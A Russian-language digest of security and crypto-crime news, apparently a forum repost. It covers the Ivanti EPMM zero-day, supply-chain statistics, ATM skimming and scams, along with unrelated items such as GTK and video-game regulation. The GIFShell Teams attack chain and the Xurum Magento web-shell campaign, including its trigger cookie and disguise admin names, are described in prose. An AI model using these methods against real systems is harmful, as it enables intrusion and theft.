• Source: [https://www.microsoft.com/security/...obelium-malware-leads-to- persistent- backdoor/](https://www.microsoft.com/security/blog/2021/09/27/foggyweb- targeted-nobelium-malware-leads-to-persistent-backdoor/)
Фонд OSTIF (Open Source Technology Improvement Fund), созданный с целью усиления защищённости открытых проектов, [объявил](https://ostif.org/google- is-partnering-with-open-source-technology-improvement-fund-inc-to-sponsor- security-reviews-of-critical-open-source-software/) о сотрудничестве с компанией Google, которая выразила готовность профинансировать проведение независимого аудита безопасности 8 открытых проектов. На полученные от Google средства решено провести аудит Git, JavaScript-библиотеки Lodash, PHP- фреймворка Laravel, Java-фреймворка Slf4j, JSON-библиотек Jackson (Jackson- core и Jackson-databind) и Java-компонентов Apache Httpcomponents (Httpcomponents-core и Httpcomponents-client).
Ранее на полученные в результате сбора пожертвований средства фонд OSTIF уже провёл аудит проектов OpenSSL, VeraCrypt, OpenVPN, Monero, Unbound DNS и QRL. Отдельно сообществом уже собраны средства для аудита PHP-фреймворка Symfony. В случае получения дополнительного финансирования для аудита также намечены проекты Systemd, Electron, Rails, Dropal, Joomla, WebPack, Reprepro, Ceph, React Native, Salt, Ansible, Angilar, Gatsby и Guava.
Выбор произведён эмпирическим путём на основе оценки влияния безопасности проекта на экосистему открытого ПО и потенциальной выгоды для сообщества от увеличения безопасности рассматриваемых проектов. Для примерно 100 тысяч проектов на GitHub был [вычислен](https://docs.google.com/spreadsheets/d/1uahUIUa82J6WetAqtxCM_qgH- YJOagH84AFniIhlAbg/edit#gid=650393321) коэффициент, учитывающий такие факторы, как популярность использования в качестве зависимости, востребованность в инфраструктурах, число разработчиков, активность разработки, число закрытых и незакрытых сообщений об ошибках, число поддерживающих проект организаций, частота выпуска обновлений, история выявления уязвимостей и т.п.
Компания Sonatype, специализирующаяся на защите от атак, манипулирующих подменой программных компонентов и зависимостей (supply chain), [опубликовала](https://blog.sonatype.com/introducing-our-9th-annual-state-of- the-software-supply-chain-report) результаты [исследования](https://www.sonatype.com/state-of-the-software-supply- chain/Introduction) ( [PDF, 62](https://www.sonatype.com/hubfs/9th-Annual- SSSC-Report.pdf). стр. ) проблем с зависимостями и сопровождением открытых проектов на языках Java, JavaScript, Python и .NET, представленных в репозиториях Maven Central, NPM, PyPl и Nuget. За год отмечено увеличение числа проектов в отслеживаемых открытых экосистемах в среднем на 29%. Число загрузок пакетов из рассматриваемых репозиториев в 2023 году выросло на 33%, но для сравнения в 2021 году число загрузок увеличилось на 73%.
Существенно выросла вредоносная активность в репозиториях - с начала года выявлено 245 тысяч вредоносных пакетов и в два раза увеличилось число зафиксированных атак, нацеленных на подмену зависимостей.
Многие проекты продолжают использовать уязвимые версии, например, 23% загрузок Java-пакета Log4j до сих пор составляют версии с критическими уязвимостями, устранёнными в 2021 году. В репозитории Maven Central около 12% всех загрузок приходятся на компоненты, содержащие известные уязвимости. В среднем для всех репозиториев доля загрузок старых версий пакетов, относящихся к категориям рискованных (например, с неисправленными уязвимостями) составляет 20% (в 80% случаев загружается актуальная версия). В 96% случаев загрузки компонентов с уязвимостями можно было избежать, выбрав версии, в которых проблема уже устранена.
Значительную проблему в поддержании безопасности также составляет качественно сопровождение проектов. В экосистемах для языков Java и JavaScript с этим большие проблемы - за последний год было прекращено сопровождение каждого пятого проекта (18.6%), представленного в Maven Central и NPM, и сопровождаемого в предыдущем году. Из 1.176 миллиона проанализированных проектов, присутствующих в репозиториях Maven, NPM, PyPl и Nuget, только 11% (118 тысяч) продолжают активно сопровождаться.
В ходе исследования также был проведён опрос 621 профессионального разработчика из различных компаний. 67% опрошенных полагают, что их приложения не используют уязвимые библиотеки, 10% за последние 12 месяцев сталкивались с инцидентами с безопасностью, вызванными уязвимостями в открытом ПО, а 20% затрудняются ответить. 28% компаний определяют наличие уязвимых компонентов в течение 1 дня после раскрытия данных об уязвимости, 39% - от 1 до 7 дней, а 29% - более недели.
Управление национальной безопасности Норвегии (Nasjonal Sikkerhetsmyndighet, NSM) [сообщило](https://nsm.no/aktuelt/nulldagssarbarhet-i-ivanti-endpoint- manager-mobileiron-core), что сразу 12 правительственных учреждений пострадали от атаки на критическую уязвимость нулевого дня в решении Ivanti Endpoint Manager Mobile (EPMM, ранее MobileIron Core). Пострадавшая от хакерской атаки платформа использовалась самыми разными министерствами страны, но известно, что инцидент не затронул Канцелярию премьер-министра, Министерство обороны, Министерство юстиции и Министерство иностранных дел.
Норвежское управление по защите данных (DPA) уже уведомлено об инциденте, то есть, скорее всего, хакеры могли получить доступ к конфиденциальной информации в скомпрометированных системах, и произошла утечка данных.
При этом подчеркивается, что правительство страны продолжает работать в обычном режиме, и произошедшее никак не повлияло на работу властей.
Вскоре после публикации официальных заявлений норвежских властей стало известно, о какой именно уязвимости идет речь. Критический баг, получивший идентификатор [CVE-2023-35078](https://forums.ivanti.com/s/article/KB-Remote- unauthenticated-API-access-vulnerability-CVE-2023-35078) (10 баллов из 10 возможных по шкале CVSS), был обнаружен норвежскими правительственными ИБ- специалистами в продукте для управления мобильными устройствами Endpoint Manager Mobile (EPMM, ранее известен под названием MobileIron Core) компании Ivanti.
В NSM заявили, что скрывали информацию о 0-day баге до тех пор, пока Ivanti не выпустила патч. Дело в том, что эксперты опасались, что уязвимость будет использована как в Норвегии, так и за рубежом, если они раскроют подробности о ней слишком рано.
Проблема связана с обходом аутентификации и затрагивает все поддерживаемые версии EPMM, а также более старые. Успешная эксплуатация уязвимости позволяет злоумышленнику получать доступ к определенным путям API без необходимости аутентификации.
«Злоумышленник, имеющий доступ к этим путям API, может получить доступ к личной информации, включая имена, номера телефонов и другие данные о мобильных устройствах пользователей в уязвимой системе, — предупреждает в собственном [бюллетене безопасности](https://www.cisa.gov/news- events/alerts/2023/07/24/ivanti-releases-security-updates-endpoint-manager- mobile-epmm-cve-2023-35078) Агентство США по кибербезопасности и защите инфраструктуры (CISA). — Злоумышленник также может внести изменения в конфигурацию, в том числе создать учетную запись администратора EPMM, которая сможет внести дополнительные изменения в уязвимую систему».
Click to expand...
Теперь администраторам рекомендуется как можно скорее обновить EPMM до версий 11.8.1.1, 11.9.1.1 и 11.10.0.2, где уязвимость было устранена. Патчи доступны даже для неподдерживаемых и устаревших версий ПО ниже 11.8.1.0 (например, 11.7.0.0, 11.5.0.0).
Представители Ivanti [сообщают](https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm- vulnerability), что, по информации их «надежного источника», уязвимость уже использовалась против небольшого числа клиентов компании, но дополнительную информацию разработчики пока не раскрывают. Фактически, официально подтверждена только информация об атаке на власти Норвегии.
По данным издания Bleeping Comptuer, Ivanti вообще вынудила некоторых клиентов
подписать соглашение о неразглашении при запросе дополнительной информации об
уязвимости CVE-2023-35078.
Согласно данным Shodan, в сети доступны более
2900
пользовательских порталов MobileIron, а по меньшей мере 30 из них
связаны
с муниципальными и федеральными государственными органами США.
Большинство доступных из интернета серверов расположены в США, Германии, Великобритании и Гонконге.
Комитет ГД по информполитике отклонил поправку о запрете пропаганды насилия в видеоиграх
11 ноября первый замглавы комитета Госдумы по просвещению Яна Лантратова
предложила ко второму чтению
законопроектов о запрете пропаганды нетрадиционных сексуальных отношений ряд
поправок, запрещающих видеоигры, в которых демонстрируются ЛГБТ-отношения и
акты насилия.
В документе говорится, что помимо запрета на сцены с насилием и жесткостью,
игры не должны содержать информацию об изготовлении наркотиков, способах
суицида, а также ненормативную лексику.
Депутат указала, что инициатива позволит защитить детей и подростков от
негативного влияния.
Как пишет RTVI, в Комитет по информационной
политике выступили против поправок к закону о пропаганде ЛГБТ во втором
чтении.
Депутат Александр Хинштейн считает, что видеоигры нужно регулировать, но в
другом формате. По его словам, поспешные решения могут привести к обратным
последствиям. В России «могут исчезнуть все игры-стрелялки», уточнил Хинштейн.
Депутаты считают, что должен появиться отдельный законопроект, регулирующий
компьютерные игры.
Новый вектор атаки “GIFShell“ позволяет киберпреступникам использовать Microsoft Teams в фишинговых кампаниях. В результате злоумышленники могут выполнить команды и выкрасть необходимые данные с помощью графических изображений в формате GIF.
По словам исследователей, которые поделились новым вектором с BleepingCompute, атакующие могут связать ряд уязвимостей в Microsoft Teams, что позволит им задействовать легитимную инфраструктуру Microsoft для доставки вредоносных файлов, выполнения команд и извлечения файлов с помощью GIF.
В процессе кражи данных через серверы Microsoft защитным программам будет сложнее детектировать нежелательный трафик, поскольку они будут расценивать его как безобидный поток Microsoft Team.
Принцип GIFShell строится на использовании ряда уязвимостей в Microsoft Teams и состоит из следующих шагов:
обход проверок безопасности Microsoft Teams — позволяет внешним пользователям отправлять вложения юзерам Microsoft Teams;
модификация отправленных вложений — позволяет заставить пользователя скачать файл по внешнему URL вместо сгенерированной ссылки SharePoint;
спуфинг вложений, который необходим для того, чтобы они выглядели безобидными файлами, но в итоге загружали вредоносный исполняемый файл или документ;
небезопасные URI-схемы — позволяют стащить хеш SMB NTLM или провести атаку на ретранслятор NTLM (NTLM relay);
Microsoft поддерживает отправку зашифрованных base64 GIF, но не сканирует содержимое байтов этих GIF. Это позволяет доставлять вредоносные команды с помощью легитимных с виду GIF;
Microsoft хранит сообщения Teams в лог-файле, который хранится локально на устройстве жертвы. Причём он доступен пользователю с низкими правами.
серверы Microsoft получают GIF с удалённых серверов, допуская извлечения данных с помощью имён GIF-файлов.
На вектор указал эксперт [Бобби Раух](https://www.linkedin.com/in/bobby- rauch/), выявивший множество уязвимостей в Microsoft Teams, которые можно использовать в связке для выполнения команд, извлечения данных, обхода проверок и фишинговых атак.
[GIFShell](http://medium.com/@bobbyrsec/gifshell-covert-attack-chain- and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7), по словам специалиста, позволяет атакующему создать обратный шелл, доставляющий вредоносные команды через зашифрованные base64 GIF в Teams. Раух даже опубликовал Python- скрипт, отправляющий пользователю Microsoft Teams сообщение, содержащее специально созданный GIF с командами.
Банк оперативно пресекает использование украденной информации и следит за скомпрометированными счетам.
Финансовая организация Bank of the West, имеющая более 600 филиалов в США, впервые обнаружила волну подозрительных попыток снятия денег в ноябре 2021 года и объединилась с правоохранительными органами для проведения углубленного расследования. Проверка всей сети банкоматов организации была завершена 18 апреля 2022 года и показала, что кто-то установил скиммеры на неопределенное количество банкоматов.
"Установленное в банкомате скимминговое устройство мешало проведению обычной операции с дебетовой картой и позволяло злоумышленнику украсть номера карт, PIN-коды, имя и адрес жертвы", – говорится в сообщении для пострадавших клиентов банка. "Украденная информация могла быть использована для создания поддельных дебетовых карт и кражи средств".
По словам представителей банка, использование украденной информации о картах быстро пресекается, а все взломанные счета контролируются специалистами.
Отмечается, что с 28 января по официальным адресам судебной власти происходит рассылка с якобы судебными запросами. При этом по ссылкам в письме загружается вредоносное программное обеспечение.
«Проблему усугубляет то, что рассылка происходит с настоящих почтовых серверов судебной власти. Таким образом, письма проходят спам-фильтры и вызывают доверие. Возможно, скомпрометированы только отдельные адреса судов, хотя не стоит исключать, что может быть скомпрометирован весь почтовый сервер», — сообщает пресс-служба центра в Telegram.
14 января стало известно, что неизвестные взломали официальный сайт Министерства иностранных дел Украины и разместили на нём текст с угрозами на украинском, польском и русском языках. Также атаке подверглись сайт Министерства аграрной политики и продовольствия Украины, ресурс украинского Минобразования и другие украинские государственные сайты.
Американские операторы криптоматов сформировали Cryptocurrency Compliance Cooperative (CCC) для повышения безопасности и соблюдения правил AML.
В состав кооператива вошли следующие банки и организации: Anti-Human Trafficking Intelligence Initiative, Chainalysis, CipherBlade, Coinsource, DigitalMint, Elliptic, Halo Privacy, Maya, Metropolitan Capital Bank, Palmera Consulting, Royal Business Bank, Surety Bank, The Knoble, Titan Bank и Trust Stamp. Согласно данным ССС, в 2020 году в результате криптовалютного мошенничества пользователи потеряли около $500 млн, и более 10 000 криптоматов позволяют анонимно обменивать украденные криптовалюты.
Руководитель отдела по соблюдению нормативных требований DigitalMint Сет Саттлер (Seth Sattler) сообщил, что большинство криптоматов не применяют даже минимальные средства защиты клиентов. Исполнительный вице-президент по операциям в Coinsource Бо Они (Bo Oney) добавил, что при использовании многих криптоматов достаточно указать номер мобильного телефона вместо прохождения полноценной процедуры KYC.
«Тем самым операторы криптоматов потворствуют преступникам, использующим биткоин для совершения мошенничества или торговли наркотиками, и сами создают условия, позволяющие злоупотреблять криптоматами», — заявил Бо Они.
Миссия CCC заключается в том, чтобы узаконить обмен криптовалют на наличные и наоборот посредством внедрения специальных стандартов. Они должны быть направлены на повышение безопасности криптоматов, а также на соблюдение требований процедуры KYC и правил по борьбе с отмыванием денег (AML). Это станет возможным благодаря взаимодействию операторов криптоматов с регулирующими и правоохранительными органами, традиционными финансовыми учреждениями и технологическими фирмами.
Участники ССС планируют организовывать ежеквартальные конференции, на которых они будут делиться информацией о новых нормативных актах и отраслевых стандартах, имеющих отношение к криптовалютам, а также результатами собственных исследований. Кроме того, участники кооператива будут продумывать «стратегии опережения» злоумышленников, чтобы снизить риски использования криптоматов в незаконных целях.
«Несоблюдение нормативных требований и использование криптоматов для отмывания денег уже давно подорвали их репутацию. Поэтому мы рады поддержать инициативу, возглавляемую двумя лидерами в этой индустрии, чтобы вернуть доверие к криптоматам. Это снизит риски и расширит финансовую свободу людей», — сказала руководитель отдела соблюдения нормативных требований в Chainalysis Кейтлин Барнетт (Caitlin Barnett).
Индийские правоохранители арестовали 18 человек, которые могут быть причастны к мошеннической схеме Korvio Coin на $300 млн. Среди задержанных — четыре сотрудника местной полиции.
По данным специальной следственной группы, криптовалютная схема Korvio Coin была организована в 2018 году. В результате ее деятельности пострадали около 5 000 государственных служащих и около 1 000 сотрудников полиции — их общие потери составили $300 млн. В период с 2021 по 2023 годы в полицию индийского штата Химачал-Прадеш поступило 56 жалоб от пострадавших пользователей. В общей сложности, создателям схемы удалось обмануть около 100 000 человек.
Организаторы и промоутеры криптопроекта привлекали людей через множество поддельных веб-сайтов. Собрав нужное количество средств, создатели Korvio Coin использовали распространенную схему вывода ликвидности (rug pull), похитив деньги инвесторов. Главным подозреваемым, организовавшим криптосхему, считается гражданин Индии Субхаш Шарма (Subhash Sharma), который сейчас скрывается от следствия. Несколько объектов собственности, связанных с Шармой, уже конфискованы полицией.
Правоохранители сообщили, что следует ожидать новых арестов в связи с незаконной деятельностью Korvio Coin. Выяснилось, что около 300 участникам криптосхемы удалось добиться в ней значительных успехов и заработать от $120 000 до $240 000. В число этих «счастливчиков» вошли сотрудники полиции, которые тоже вкладывали деньги в схему и убеждали других инвестировать в Korvio Coin.
В начале сентября индийская полиция арестовала группу криптовалютных мошенников, предлагавших инвесторам купить поддельные стейблкоины USDT в половину номинальной стоимости. В связи с участившимися случаями мошенничества с цифровыми активами, Министерство внутренних дел Индии стало разрабатывать инструмент для отслеживания подозрительных криптотранзакций в даркнете.
Akamai [предупреждает](https://www.akamai.com/blog/security-research/new- sophisticated-magento-campaign-xurum-webshell), что e-commerce сайты, работающие под управлением Adobe Magento 2, становятся жертвами вредоносной кампании Xurum, начавшейся еще в январе 2023 года.
В своих атаках хакеры эксплуатируют уже исправленную критическую уязвимость CVE-2022-24086 (9,8 балла по шкале CVSS) в Adobe Commerce и Magento Open Source, которая позволяет им добиться удаленного выполнения произвольного кода.
CVE-2022-24086 используется для первоначального доступа к целевым системам, а затем злоумышленники переходят к выполнению вредоносного PHP-кода, который собирает информацию о хосте и внедрят веб-шелл wso-ng, который маскируется под компонент Google Shopping Ads.
Отмечается, что этот бэкдор работает в памяти и активируется лишь тогда, когда злоумышленник отправляет в HTTP-запросе файл cookie magemojo000, после чего осуществляется доступ и извлечение информации о способах оплаты заказов за последние 10 дней.
Считается, что wso-ng — это эволюционировавший веб-шелл WSO, который обладает новой скрытой страницей входа для кражи учетных данных жертв, а также интегрируется с такими легитимными инструментами, как VirusTotal и SecurityTrails, чтобы узнать репутацию IP-адреса зараженной машины и получить информацию о других доменах, расположенных на том же сервере.
Как правило, атаки завершаются добавлением на сайт пользователя-администратора с именем mageworx или mageplaza. Таким способом хакеры пытаются замаскировать свои действия, поскольку такие имена обычно используются популярными расширениями для Magento.
В отчете исследователей отмечается, что некоторые из пострадавших сайтов также оказались заражены простыми веб-скиммерами на основе JavaScript, предназначенными для сбора и кражи информации о банковских картах.
«Злоумышленники демонстрируют тщательность, нацеливаясь только на конкретные экземпляры Magento 2, и не распространяют свои эксплоиты без разбора по всему интернету, — пишут исследователи. — Они демонстрируют высокий уровень знаний о Magento и тратят значительное время на изучение его внутренних компонентов, создание инфраструктуры для атак и тестирование своих эксплоитов на реальных объектах».
Click to expand...
Эммануэль Басси, разработчик проекта среды рабочего стола GNOME, инициировал обсуждение возможности прекращения поддержки X11 в следующем выпуске Gtk. Система X Window System (или X11) довольно старая, последняя стабильная версия, X11R7.7, выпущена в 2012 году, и в настоящее время внимание сообщества разработчиков открытого кода сосредоточено на сервере отображения Wayland. Gtk

GitLab ](https://gitlab.gnome.org/GNOME/gtk/-/issues/5004)
It is not getting any better, and Wayland is widely available.
gitlab.gnome.org
](https://news.slashdot.org/story/22/07/05/2110211/gtk-5-might- drop-x11-support-says-gnome-dev)
One of the GNOME developers has suggested that the next major release of Gtk could drop support for the X window system. The Register reports: Emmanuele Bassi opened a discussion last week on the GNOME project's Gitlab instance that asked whether the developers could drop X.11 support in the...
news.slashdot.org
Увеличивается число киберпреступлений в NFT-пространстве
Наиболее распространенные атаки пытаются обмануть владельцев криптовалюты и получить фразу восстановления криптокошелька. Жертвы часто рискуют навсегда потерять доступ к своим средствам», - сказал Крис Бойд.
__
](https://www.securitylab.ru/news/531548.php)
Увеличивается число киберпреступлений в NFT-пространстве
 www.securitylab.ru
Федеральный суд Майами предъявил основателю и генеральному директору ныне не существующей криптовалютной биржи Cryptsy Полу Вернону обвинительное заключение по 17 пунктам.
Согласно информации, опубликованной на сайте Министерства юстиции США, Пол Вернон (Paul Vernon) обвиняется в организации изощренных схем для кражи криптоактивов через торговую площадку Cryptsy. Ранее она находилась под управлением компании Project Investors Inc. Вернон обвиняется в уклонении от уплаты налогов, мошенничестве с использованием электронных средств, отмывании денег, компьютерном мошенничестве, фальсификации записей систем учета и документов, а также в их уничтожении.
По обвинению прокуратуры, Вернон заверял пользователей в безопасности биржи, контролируя криптоактивы трейдеров. В период с мая 2013 года по май 2015 года он злоупотреблял своими полномочиями, благодаря чему смог украсть с биржевых кошельков пользователей Cryptsy криптоактивы на общую сумму более $1 млн. Присвоив клиентские средства, он перевел их на свой адрес, а затем на личный банковский счет.
В конце июля 2014 года Вернон сообщил сотрудникам Cryptsy, что торговая платформа была взломана, и хакерам удалось присвоить криптовалюты на сумму более $5 млн. В течение шести месяцев после раскрытия этой информации своим сотрудникам, Вернон продолжал управлять Cryptsy и привлекать новых клиентов, не сообщая им о том, что безопасность площадки находится под угрозой. В ноябре 2015 года он внезапно переехал в Китай, после чего публично сообщил о взломе кошельков Cryptsy в 2014 году и потере криптоактивов. В апреле 2016 года, после получения уведомления о ликвидации Cryptsy, Вернон взломал серверы биржи и уничтожил базу данных клиентов, чтобы скрыть свои незаконные действия.
Прокуратура также утверждает, что Вернон пытался уклониться от уплаты федерального подоходного налога за 2014 и 2015 годы. Он подделывал налоговые декларации, занижая суммы, причитавшиеся к оплате. На сайте минюста США указано, что подсудимый будет считаться невиновным до тех пор, пока его вина не будет доказана в суде.
В 2017 году судебное разбирательство с Cryptsy отчасти затронуло и криптовалютную биржу Coinbase. Обманутые пользователи Cryptsy утверждали, что Вернон отмывал деньги через Coinbase, которая должна была знать, что эти криптоактивы поступали из сомнительных источников.
• Source: justice[.]gov/usao-sdfl/pr/ceo-major-online-cryptocurrency-exchange- company-indicted-defrauding-company-s
Противоправную деятельность пятерых жителей Каменского разоблачили работники управления противодействия киберпреступлениям в Днепропетровской области совместно со следователями областной полиции.
Разработали преступную схему 31-летний и 29-летний мужчины и привлекли к ней трех знакомых. Фигуранты временно трудоустраивались в заведения питания и розничной торговли, в которых для расчета клиентов использовались POS- терминалы. В дальнейшем злоумышленники скрыто устанавливали в этих заведениях скиминговые устройства, а также самостоятельно изготовленные POS-терминалы.
Под видом осуществления расчета клиентов через POS-терминалы фигуранты копировали информацию с банковской карты, а также записывали PIN-коды. Собранную информацию участники группы использовали для изготовления дубликатов банковских карточек потерпевших. Впоследствии скомпрометированные карточки использовали для доступа к интернет-банкингу, а затем увеличивали кредитные лимиты и переводили деньги на подконтрольные счета. В дальнейшем снимали наличные в банкоматах, покупали товары и оформляли кредиты на потерпевших.
По предварительным данным, злоумышленники скомпрометировали около 200 банковских карт. Общая сумма ущерба составляет миллион гривен.
Работники полиции провели обыски в домах фигурантов, а также в заведениях, где участники группы использовали оборудование для считывания информации с банковских карточек. Изъяты скимеры, POS-терминалы, поддельные карточки и компьютерная техника.
Организатору и соорганизатору группы уже сообщено о подозрении в совершении уголовных правонарушений, предусмотренных ч. 2 ст. 185 (Кража), ч. 2 ст. 200 (Незаконные действия с документами на перевод, платежными карточками и другими средствами доступа к банковским счетам, электронными деньгами, оборудованием для их изготовления)2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Подозреваемым избрана мера пресечения в виде содержания под стражей. Им может грозить до шести лет лишения свободы.
Сейчас решается вопрос об объявлении подозрения другим участникам группы.
В сентябре нынешнего года европейские регуляторы обвинили Meta в нарушении требований GDPR.
Сервис WhatsApp обновил свои политики конфиденциальности, сделав их более прозрачными, после рекордного штрафа в размере 225 млн евро и строго выговора регуляторов ранее в нынешнем году.
Как сообщили в компании, обновление не меняет ее методы обработки пользовательских данных, но приводит политики конфиденциальности в соответствие с требованиями Евросоюза по обеспечению прозрачности этих методов.
В сентябре нынешнего года европейские регуляторы обвинили компанию Meta (тогда Facebook) в том, что она должным образом не информирует пользователей о юрисдикциях, в которых WhatsApp обрабатывает их данные, и о способах идентификации людей в их списках контактов.
Сумма, на которую была оштрафована Meta, была (и до сих пор остается) самой крупной, когда-либо установленной Комиссией по защите данных Ирландии (DPC). DPC является главным надзорным органом над Meta в Европе, поскольку ее европейские операции базируются в Дублине.
Компания была оштрафована после того, как несколько регуляторов в области защиты данных обратились в Европейский совет по защите данных (EDPB) в Брюсселе с целью обеспечить одинаковое трактование закона по всей территории Евросоюза.
В июле EDPB опубликовала заключение, в котором подробно объясняется, почему WhatsApp не соответствует "Общему регламенту по защите данных " (GDPR), и рекомендовала DPC оштрафовать компанию на рекордную сумму.
Согласно заявлению, сопровождающему обновление политик конфиденциальности WhatsApp, сервис изменил свои политики, как было предписано DPC, и добавили подробности о методах обработки данных для европейских пользователей, пишет SkyNews.
"Мы не согласны с решением и подали апелляцию, поскольку уже предоставляем всю необходимую информацию всем нашим пользователям", - сообщили в пресс-службе WhatsApp.
Новые политики конфиденциальности не требуют от пользователей принятия новых условий пользования.
Подробнее: https://www.securitylab.ru/news/526791.php
Хотя атака была отражена, превентивное отключение IT-систем компании привело к сбоям в отгрузке товара.
Шотландская машиностроительная компания Weir Group устраняет последствия кибератаки с использованием вымогательского ПО. Производственные и другие процессы будут восстановлены в течение ближайших несколько недель, однако последствия сбоев компания будет ощущать на протяжении всего четвертого квартала.
Как сообщает Weir Group, во второй половине прошлого месяца злоумышленники попытались атаковать ее компьютерные системы, но ее решения безопасности быстро среагировали, и компания незамедлительно приняла соответствующие меры.
В частности, пришлось изолировать и отключить IT-системы, в том числе ключевые инженерные приложения и приложения для планирования корпоративных ресурсов. В настоящее время работа этих приложений частично восстановлена, остальные возвращаются online в соответствии с приоритетными бизнес-задачами.
Отключение систем вызвало серию сбоев в инженерных и производственных процессах, а также к отсрочке отгрузки товара. В свою очередь, это привело к отсрочке выручки и неполному возмещению накладных расходов.
Расследование инцидента продолжается, и по словам Weir, никаких свидетельств того, что персональные или другие конфиденциальные данные были скомпрометированы или зашифрованы, обнаружены не были.
Тем не менее, из-за задержек в отгрузке в сентябре Weir столкнулась с отсрочкой выручки на сумму порядка 50 млн фунтов стерлингов наряду с недовыполнением накладных расходов в производстве и машиностроении.
Ожидается, что влияние спада выручки в четвертом квартале на операционную прибыль за весь год составит от 10 до 20 млн фунтов стерлингов, в то время как влияние неполного возмещения накладных расходов составит от 10 до 15 млн фунтов стерлингов.
Наибольшее влияние инцидента ощутит на себе горнодобывающее подразделение Weir из-за сложных инженерных процессов и цепочки поставок. Ожидается, что прямые затраты компании на ликвидацию последствий кибератаки составят до 5 млн фунтов стерлингов.
Согласно прогнозам специалистов Weir, годовая прибыль компании до налогообложения составит 230-245 млн фунтов стерлингов.
Подробнее: https://www.securitylab.ru/news/525406.php
Аферисты, притворившись сотрудниками МТС
,
убедили его обновить приложение, получив доступ к телефону и данным.
Затем позвонили лже-сотрудники банка, сообщив о попытках взять кредиты на его
имя. Его убедили взять "встречный" кредит и перевести деньги на "безопасный
счет"
.
В итоге он перевел 10 млн своих сбережений (от продажи машины) и 6 млн
кредитных средств (под залог квартиры)
!
Возбуждено уголовное дело по ст. 159 УК РФ (мошенничество). МВД предупреждает:
не доверяйте незнакомцам, не сообщайте коды из СМС и не переводите деньги на
неизвестные счета!
Криптовалютная биржа Bittrex объявила о прекращении своей деятельности с 4 декабря.
Она была одной из трёх крупнейших в мире, однако не справилась с давлением регуляторов.
«Торги на Bittrex Global будут приостановлены с понедельника, 4 декабря. Все средства и токены остаются в безопасности на платформе Bittrex Global и доступны для вывода», — говорится в сообщении.
Под видом сотрудников службы безопасности ведущих украинских банков злоумышленники звонили гражданам, вмешивались в их мобильный банкинг и переводили деньги потерпевших на банковские счета подставных лиц, международные криптовалютные биржи и счета азартных игровых платформ. Полицейские устанавливают всех потерпевших граждан, сумма нанесенного ущерба может превышать 100 миллионов гривен.
В ходе досудебного расследования следователи полиции установили, что организатором преступной группы является житель временно оккупированной территории Донецкой области, который в апреле 2014 года занимал должность министра иностранных дел так называемой донецкой народной республики. Ячейки его преступной группировки действовали в РФ, на временно оккупированных территориях Донецкой и Луганской областей, а также в некоторых других регионах Украины.
Работники Главного следственного управления и Департаментов уголовного розыска Национальной полиции Украины совместно с Киберполицией и работниками управлений уголовного розыска ГУНП в Одесской, Днепропетровской, Кировоградской, Полтавской областях при силовой поддержке спецназа КОРД и ППОП осуществили масштабную операцию в шести регионах страны, в ходе которой Установлено, что группа действовала на территории Украины с августа 2022 по ноябрь 2023 года.
При процессуальном руководстве Офиса Генерального прокурора шести фигурантам сообщено о подозрении за мошенничество и кражи, совершенные организованной группой лиц (ч. 4 ст. 190 и ч. 5 ст. 185 Уголовного кодекса Украины). Вручено ходатайство об избрании меры пресечения в виде содержания под стражей четырем из них. Другие фигуранты, скрывающиеся за границей, объявлены в международный розыск.
Досудебное расследование продолжается.
Российские компании с экспертизой в области криптографии и квантовых технологий объединяют усилия для предотвращения угрозы криптографическим системам со стороны квантовых компьютеров.
Так, открытая реализация отечественного постквантового алгоритма «Шиповник» компании «Криптонит» подготовлена компанией «QApp» в ходе её деятельности в составе рабочей группы «Постквантовые криптографические механизмы» Технического комитета 26 Росстандарта (ТК 26). Проект написан на языке Си с оптимизацией под наборы команд SSE4.1, SSE2 и MMX. Исходный код доступен на GitHub. Он компилируется в библиотеку, которую можно встраивать в промышленные криптографические устройства и программные продукты.
«Использование оптимизации кода приводит к высокой скорости реализации «Шиповника». В тестах на Intel Core i7-8700 выработка ключевой пары заняла 3 мс, подпись одного сообщения — 848 миллисекунд, а проверка подписи — всего 11 мс», — пояснил Сергей Гребнев, криптоаналитик и руководитель группы прикладных исследований компании «QApp».
«Шиповник» — алгоритм электронной подписи, устойчивый к атакам с использованием квантового компьютера. Он разработан экспертами-криптографами российской компании «Криптонит», участвующими в деятельности рабочей группы ТК 26.
Алгоритм «[Шиповник](https://kryptonite.ru/articles/how-eds-will-change-in- the-post-quantum-era/)» построен на основе теоретико-кодового протокола идентификации Штерна. Стойкость этой схемы подписи к подделке основана на сложности задачи декодирования случайного линейного кода. Профессором математики Элвином Берлекэмпом в 1978 году было доказано, что эта задача относится к классу NP-сложных задач. Для задач данного класса до сих пор неизвестны эффективные алгоритмы решения ни на классическом компьютере, ни на квантовом.
Согласно данным «Криптонита», в настоящий момент лучшая известная атака с использованием классического компьютера на схему «Шиповник» потребует 2^256 битовых операций. То есть её невозможно выполнить за разумное время на самых быстрых суперкомпьютерах. Теоретическая стойкость к «квантовой» атаке оценивается в 2^170 операций, что также делает её выполнение невозможным даже на квантовых компьютерах будущего с миллиардами рабочих кубитов.
«Считаю публикацию программной реализации схемы подписи «Шиповник» значимым событием в международном криптографическом сообществе и важной вехой в развитии отечественной постквантовой криптографии. Она позволяет создавать надёжные реализации электронной подписи, устойчивые к атакам с использованием самых мощных суперкомпьютеров традиционной архитектуры и ещё только разрабатываемых квантовых компьютеров», — пояснил руководитель лаборатории криптографии компании «Криптонит» Василий Шишкин.
«Если идти по пути традиционного принципа противодействия: сначала проблема, а потом решение, то надёжных решений информационной безопасности не построить. В те далёкие годы учёные пошли по пути разработки защиты, не имея реальной угрозы. Когда математика и физика как науки стояли у истоков защиты информации, был заложен основной фундамент в постквантовой криптографии и защите от атак с применением квантовых компьютеров при реальном отсутствии мощных вычислителей. Сегодня, когда вычислительные мощности производят сложнейшие операции за доли секунд, мы видим, как рабочая группа «Постквантовые криптографические механизмы» в составе ведущих специалистов из компании «Криптонит» и компании-резидента Киберхаба Сколково QApp создали открытую реализацию нового постквантового алгоритма электронной подписи «Шиповник». Данный алгоритм обеспечит целостность и доступность информации при передаче на любые расстояния и будет актуален ещё многие годы», — добавил руководитель Киберхаба Сколково Игорь Бирюков
